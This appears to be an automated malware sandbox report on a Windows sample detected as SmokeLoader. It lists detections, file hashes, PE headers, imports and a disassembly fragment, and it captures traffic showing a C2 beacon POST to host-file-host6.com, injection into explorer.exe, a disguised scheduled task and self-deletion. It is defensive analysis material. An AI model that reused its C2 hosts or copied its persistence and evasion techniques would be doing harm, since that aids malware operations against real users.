                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 678081 Sample: 6s1js8BzrC.exe Startdate: 03/08/2022 Architecture: WINDOWS Score: 100 30 Snort IDS alert for network traffic 2->30 32 Multi AV Scanner detection for domain / URL 2->32 34 Antivirus detection for URL or domain 2->34 36 5 other signatures 2->36 7 6s1js8BzrC.exe 2->7         started        10 twtgjvf 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 6s1js8BzrC.exe 7->12         started        50 Multi AV Scanner detection for dropped file 10->50 52 Machine Learning detection for dropped file 10->52 15 twtgjvf 10->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 2 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 host-file-host6.com 34.118.39.10, 49722, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\twtgjvf, PE32 17->22 dropped 24 C:\Users\user\...\twtgjvf:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    6s1js8BzrC.exe41%VirustotalBrowse
                    6s1js8BzrC.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\twtgjvf100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\twtgjvf41%VirustotalBrowse
                    SourceDetectionScannerLabelLinkDownload
                    2.0.6s1js8BzrC.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.0.6s1js8BzrC.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    7.0.twtgjvf.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.2.6s1js8BzrC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    7.0.twtgjvf.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.6s1js8BzrC.exe.400000.0.unpack100%AviraHEUR/AGEN.1229097Download File
                    2.0.6s1js8BzrC.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    7.0.twtgjvf.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.2.twtgjvf.24c15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.2.twtgjvf.400000.0.unpack100%AviraHEUR/AGEN.1229097Download File
                    7.2.twtgjvf.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.6s1js8BzrC.exe.24c15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    SourceDetectionScannerLabelLink
                    host-file-host6.com25%VirustotalBrowse
                    host-host-file8.com22%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://schemas.mi0%URL Reputationsafe
                    http://host-file-host6.com/0%URL Reputationsafe
                    http://host-host-file8.com/100%URL Reputationmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    host-file-host6.com
                    34.118.39.10
                    truetrueunknown
                    host-host-file8.com
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://host-file-host6.com/true
                    • URL Reputation: safe
                    unknown
                    http://host-host-file8.com/true
                    • URL Reputation: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.miexplorer.exe, 00000003.00000000.412067253.000000000807C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.438079821.000000000807C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.395202609.000000000807C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    34.118.39.10
                    host-file-host6.comUnited States
                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:678081
                    Start date and time: 03/08/202214:51:072022-08-03 14:51:07 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 53s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:6s1js8BzrC.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@6/2@4/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 71.1% (good quality ratio 60.3%)
                    • Quality average: 45.5%
                    • Quality standard deviation: 27.2%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 13
                    • Number of non-executed functions: 1
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    14:53:09Task SchedulerRun new task: Firefox Default Browser Agent 3106851CBFE21B54 path: C:\Users\user\AppData\Roaming\twtgjvf
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    34.118.39.10CraHZCrkGP.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    ofAn3uUEPe.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    Qv4fcaX7ft.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    LmrveSjxrV.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    bkcv3m0lbI.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    host-file-host6.comCraHZCrkGP.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    ofAn3uUEPe.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    Qv4fcaX7ft.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    LmrveSjxrV.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    bkcv3m0lbI.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    honnt2B52R.exeGet hashmaliciousBrowse
                    • 45.10.245.123
                    qgMsRC8rxY.exeGet hashmaliciousBrowse
                    • 45.10.245.123
                    dnwTgRPrMt.exeGet hashmaliciousBrowse
                    • 45.10.245.123
                    XDI45oOlKD.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    3DTODu3c3Q.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    frryhpyg7X.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    5PKLFz4ssj.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    ZqoECFonz7.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    txLwZ1Q8qA.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    rUmY6Fzdbb.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    Tw2ZBwph5T.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    gdMgIdm8jX.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    Zp85cHmvpw.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    SecuriteInfo.com.W32.AIDetect.malware1.19286.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    SecuriteInfo.com.W32.AIDetect.malware1.23625.exeGet hashmaliciousBrowse
                    • 34.81.117.83
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    GOOGLE-AS-APGoogleAsiaPacificPteLtdSGCraHZCrkGP.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    ofAn3uUEPe.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    Qv4fcaX7ft.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    File.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    LmrveSjxrV.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    https://www.chockingpilotenergetic.com/Get hashmaliciousBrowse
                    • 34.117.168.233
                    bkcv3m0lbI.exeGet hashmaliciousBrowse
                    • 34.118.39.10
                    GalacticFever.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    uNtQjX264N.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    kArTtIpAD6.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    vbc.exeGet hashmaliciousBrowse
                    • 34.117.168.233
                    MnERtZQrQ5.msiGet hashmaliciousBrowse
                    • 34.117.59.81
                    Token Grab Link.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    aTlGCwT504.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    https://connecteam.sharedfileonline.com/78378378378387se7stss78941e789as8a8a78378387se7stss78941e789as8a8a88d66aa78378387se7stss78941e789as8a8a88d66aa678378387se7stss78941e789as8a8a88d66aa678378387se7stss78941e789as8a8a88d678378387se7stss78941e789as8a8a88d66aa66aa6688d66aa687se7stss78941e789as8a8a88d66a78378387se7stss78941e789as8a8a88d66aa678378387se7stss78978378387se7stss78941e789as8a8a88d66aa641e789as8a8a88d66aa6a6/?auth=helpdesk@rsccd.eduGet hashmaliciousBrowse
                    • 34.117.59.81
                    Nm0KQ1zXSJ.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    IMG-20022891.exeGet hashmaliciousBrowse
                    • 34.117.168.233
                    CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exeGet hashmaliciousBrowse
                    • 34.117.59.81
                    No context
                    No context
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):186368
                    Entropy (8bit):7.053101995036968
                    Encrypted:false
                    SSDEEP:3072:O1CItAzXunlpY2Tw4gST76X9JfIruFeKQvd4xlYCjwm3Y:OgSllDwNS/6X9OihQvqb8m
                    MD5:C9948059CDC5E0AEF9C193D605C7F659
                    SHA1:0C00B2242C86487E305D53AEA8894100BDA41035
                    SHA-256:80F503F4FD7E84B614FC5A50888629178996402D10E245193136C0AEE909B87B
                    SHA-512:916CEFA7ECE9599A4AEA3B2E909B8F0537324203B4E5E5F4BD429F9A95DDA9DCA1D877F39F8FB5313F66D10EC66317DCEBD39ACD5BDEA465C8FB2CE016AC809D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 41%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.K...K...K...$...\...$...8...B...N...K.......$...m...$...J...$...J...RichK...........................PE..L....Z.a.................,...B......gg.......@....@..................................D......................................l0..<.......Pv.......................... ................................6..@............................................text...@+.......,.................. ..`.data....:...@...0...0..............@....rsrc...Pv.......x...`..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.053101995036968
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:6s1js8BzrC.exe
                    File size:186368
                    MD5:c9948059cdc5e0aef9c193d605c7f659
                    SHA1:0c00b2242c86487e305d53aea8894100bda41035
                    SHA256:80f503f4fd7e84b614fc5a50888629178996402d10e245193136c0aee909b87b
                    SHA512:916cefa7ece9599a4aea3b2e909b8f0537324203b4e5e5f4bd429f9a95dda9dca1d877f39f8fb5313f66d10ec66317dcebd39acd5bdea465c8fb2ce016ac809d
                    SSDEEP:3072:O1CItAzXunlpY2Tw4gST76X9JfIruFeKQvd4xlYCjwm3Y:OgSllDwNS/6X9OihQvqb8m
                    TLSH:7704BE2137E0CC32D1E7693058B4C6B16A7FBD626BB8998F37A4362E1F617C15A34316
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.K...K...K...$...\...$...8...B...N...K.......$...m...$...J...$...J...RichK...........................PE..L....Z.a...........
                    Icon Hash:8a9099a9ca8ed2f2
                    Entrypoint:0x416767
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x61D55A8E [Wed Jan 5 08:45:02 2022 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:19d26450af6fae284e6a28f691d90382
                    Instruction
                    call 00007F9AC0B4F589h
                    jmp 00007F9AC0B48F4Eh
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    call 00007F9AC0B490FCh
                    xchg cl, ch
                    jmp 00007F9AC0B490E4h
                    call 00007F9AC0B490F3h
                    fxch st(0), st(1)
                    jmp 00007F9AC0B490DBh
                    fabs
                    fld1
                    mov ch, cl
                    xor cl, cl
                    jmp 00007F9AC0B490D1h
                    mov byte ptr [ebp-00000090h], FFFFFFFEh
                    fabs
                    fxch st(0), st(1)
                    fabs
                    fxch st(0), st(1)
                    fpatan
                    or cl, cl
                    je 00007F9AC0B490C6h
                    fldpi
                    fsubrp st(1), st(0)
                    or ch, ch
                    je 00007F9AC0B490C4h
                    fchs
                    ret
                    fabs
                    fld st(0), st(0)
                    fld st(0), st(0)
                    fld1
                    fsubrp st(1), st(0)
                    fxch st(0), st(1)
                    fld1
                    faddp st(1), st(0)
                    fmulp st(1), st(0)
                    ftst
                    wait
                    fstsw word ptr [ebp-000000A0h]
                    wait
                    test byte ptr [ebp-0000009Fh], 00000001h
                    jne 00007F9AC0B490C7h
                    xor ch, ch
                    fsqrt
                    ret
                    pop eax
                    jmp 00007F9AC0B4F74Fh
                    fstp st(0)
                    fld tbyte ptr [004024CAh]
                    ret
                    fstp st(0)
                    or cl, cl
                    je 00007F9AC0B490CDh
                    fstp st(0)
                    fldpi
                    or ch, ch
                    je 00007F9AC0B490C4h
                    fchs
                    ret
                    fstp st(0)
                    fldz
                    or ch, ch
                    je 00007F9AC0B490B9h
                    fchs
                    ret
                    fstp st(0)
                    jmp 00007F9AC0B4F725h
                    fstp st(0)
                    mov cl, ch
                    jmp 00007F9AC0B490C2h
                    call 00007F9AC0B4908Eh
                    jmp 00007F9AC0B4F730h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    Programming Language:
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [IMP] VS2008 SP1 build 30729
                    • [C++] VS2010 build 30319
                    • [RES] VS2010 build 30319
                    • [LNK] VS2010 build 30319
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2306c0x3c.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x20a80000x7650.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x36800x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x22b400x22c00False0.7594916254496403data7.427480094498362IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x240000x2083ad00x3000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x20a80000x76500x7800False0.6780924479166667data6.264422446606695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x20a83000xea8dataKannadaKanada
                    RT_ICON0x20a91a80x8a8dataKannadaKanada
                    RT_ICON0x20a9a500x568GLS_BINARY_LSB_FIRSTKannadaKanada
                    RT_ICON0x20a9fb80x25a8dataKannadaKanada
                    RT_ICON0x20ac5600x10a8dataKannadaKanada
                    RT_ICON0x20ad6080x988dataKannadaKanada
                    RT_ICON0x20adf900x468GLS_BINARY_LSB_FIRSTKannadaKanada
                    RT_STRING0x20ae6080x67adataFrenchSwitzerland
                    RT_STRING0x20aec880x566dataFrenchSwitzerland
                    RT_STRING0x20af1f00x45edataFrenchSwitzerland
                    RT_GROUP_ICON0x20ae3f80x68dataKannadaKanada
                    RT_VERSION0x20ae4700x194data
                    None0x20ae4600xadata
                    DLLImport
                    KERNEL32.dllFoldStringA, GetLocalTime, InterlockedDecrement, GetLocaleInfoA, InterlockedCompareExchange, _hwrite, CancelWaitableTimer, GetSystemDirectoryA, CreateEventW, ReadConsoleA, VerifyVersionInfoA, BuildCommDCBA, GetConsoleAliasExesLengthA, SetSystemTimeAdjustment, PeekConsoleInputA, EnumDateFormatsA, CreateFileW, RegisterWaitForSingleObjectEx, LoadLibraryA, WaitNamedPipeA, GetEnvironmentStrings, FindResourceExA, VirtualProtect, GetFirmwareEnvironmentVariableW, GetModuleFileNameW, BeginUpdateResourceW, EnumCalendarInfoExW, WriteConsoleOutputCharacterW, WriteConsoleA, LoadLibraryW, DeleteFileW, LocalAlloc, GetProcAddress, GetModuleHandleW, GetUserDefaultLCID, FindFirstChangeNotificationW, HeapUnlock, GetCalendarInfoW, SetConsoleTitleA, GetBinaryTypeW, GetComputerNameExA, FindNextFileA, OpenJobObjectA, HeapValidate, _lclose, GetComputerNameW, SetFileShortNameW, TlsSetValue, SetCalendarInfoW, SetComputerNameW, CreateDirectoryExA, InitializeCriticalSectionAndSpinCount, FindFirstChangeNotificationA, GetVolumePathNameW, GetProcessHandleCount, GetThreadLocale, GetSystemDefaultLangID, GetCurrentProcess, ReadFile, GetStringTypeW, HeapSize, GetDiskFreeSpaceA, HeapReAlloc, RaiseException, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, HeapAlloc, GetLastError, HeapFree, IsProcessorFeaturePresent, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DecodePointer, TerminateProcess, TlsAlloc, TlsGetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, Sleep, LCMapStringW, WriteConsoleW
                    USER32.dllClientToScreen
                    Language of compilation systemCountry where language is spokenMap
                    KannadaKanada
                    FrenchSwitzerland
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.634.118.39.1049722802851815 08/03/22-14:53:10.081323TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972280192.168.2.634.118.39.10
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 3, 2022 14:53:10.044868946 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:10.081063032 CEST804972234.118.39.10192.168.2.6
                    Aug 3, 2022 14:53:10.081182957 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:10.081322908 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:10.081337929 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:10.117552042 CEST804972234.118.39.10192.168.2.6
                    Aug 3, 2022 14:53:10.206475973 CEST804972234.118.39.10192.168.2.6
                    Aug 3, 2022 14:53:10.254339933 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:40.206978083 CEST804972234.118.39.10192.168.2.6
                    Aug 3, 2022 14:53:40.207204103 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:40.207360983 CEST4972280192.168.2.634.118.39.10
                    Aug 3, 2022 14:53:40.243535995 CEST804972234.118.39.10192.168.2.6
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 3, 2022 14:53:10.025039911 CEST4950753192.168.2.68.8.8.8
                    Aug 3, 2022 14:53:10.042541981 CEST53495078.8.8.8192.168.2.6
                    Aug 3, 2022 14:53:10.226603985 CEST5520153192.168.2.68.8.8.8
                    Aug 3, 2022 14:53:11.254611015 CEST5520153192.168.2.68.8.8.8
                    Aug 3, 2022 14:53:12.254663944 CEST5520153192.168.2.68.8.8.8
                    Aug 3, 2022 14:53:14.259399891 CEST53552018.8.8.8192.168.2.6
                    Aug 3, 2022 14:53:15.294389963 CEST53552018.8.8.8192.168.2.6
                    Aug 3, 2022 14:53:17.272901058 CEST53552018.8.8.8192.168.2.6
                    TimestampSource IPDest IPChecksumCodeType
                    Aug 3, 2022 14:53:15.295216084 CEST192.168.2.68.8.8.8cff9(Port unreachable)Destination Unreachable
                    Aug 3, 2022 14:53:17.272984982 CEST192.168.2.68.8.8.8cff9(Port unreachable)Destination Unreachable
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Aug 3, 2022 14:53:10.025039911 CEST192.168.2.68.8.8.80xab68Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:10.226603985 CEST192.168.2.68.8.8.80x9e47Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:11.254611015 CEST192.168.2.68.8.8.80x9e47Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:12.254663944 CEST192.168.2.68.8.8.80x9e47Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Aug 3, 2022 14:53:10.042541981 CEST8.8.8.8192.168.2.60xab68No error (0)host-file-host6.com34.118.39.10A (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:14.259399891 CEST8.8.8.8192.168.2.60x9e47Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:15.294389963 CEST8.8.8.8192.168.2.60x9e47Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Aug 3, 2022 14:53:17.272901058 CEST8.8.8.8192.168.2.60x9e47Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    • foxtykohl.net
                      • host-file-host6.com
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.64972234.118.39.1080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Aug 3, 2022 14:53:10.081322908 CEST110OUTPOST / HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://foxtykohl.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 121
                    Host: host-file-host6.com
                    Aug 3, 2022 14:53:10.081337929 CEST110OUTData Raw: 10 87 80 90 68 f6 dc b7 ca 4c 0d 44 0b c9 e4 89 46 13 dd 41 d1 42 18 ea bd 9e de ff f2 a1 e1 8b 6a c4 2e a6 10 6f c9 e6 e9 d2 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 52 94 aa 18
                    Data Ascii: hLDFABj.owmFu$f]dR7_p,X17Vxp ,
                    Aug 3, 2022 14:53:10.206475973 CEST110INHTTP/1.1 200 OK
                    server: nginx/1.20.1
                    date: Wed, 03 Aug 2022 12:53:10 GMT
                    content-type: text/html; charset=UTF-8
                    transfer-encoding: chunked
                    Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: FYour IP blocked0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:14:52:11
                    Start date:03/08/2022
                    Path:C:\Users\user\Desktop\6s1js8BzrC.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\6s1js8BzrC.exe"
                    Imagebase:0x400000
                    File size:186368 bytes
                    MD5 hash:C9948059CDC5E0AEF9C193D605C7F659
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:2
                    Start time:14:52:15
                    Start date:03/08/2022
                    Path:C:\Users\user\Desktop\6s1js8BzrC.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\6s1js8BzrC.exe"
                    Imagebase:0x400000
                    File size:186368 bytes
                    MD5 hash:C9948059CDC5E0AEF9C193D605C7F659
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.445865427.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.445757308.0000000002030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:3
                    Start time:14:52:23
                    Start date:03/08/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff77c400000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.423194052.0000000004D61000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    Reputation:high

                    Target ID:6
                    Start time:14:53:10
                    Start date:03/08/2022
                    Path:C:\Users\user\AppData\Roaming\twtgjvf
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\twtgjvf
                    Imagebase:0x400000
                    File size:186368 bytes
                    MD5 hash:C9948059CDC5E0AEF9C193D605C7F659
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 41%, Virustotal, Browse
                    Reputation:low

                    Target ID:7
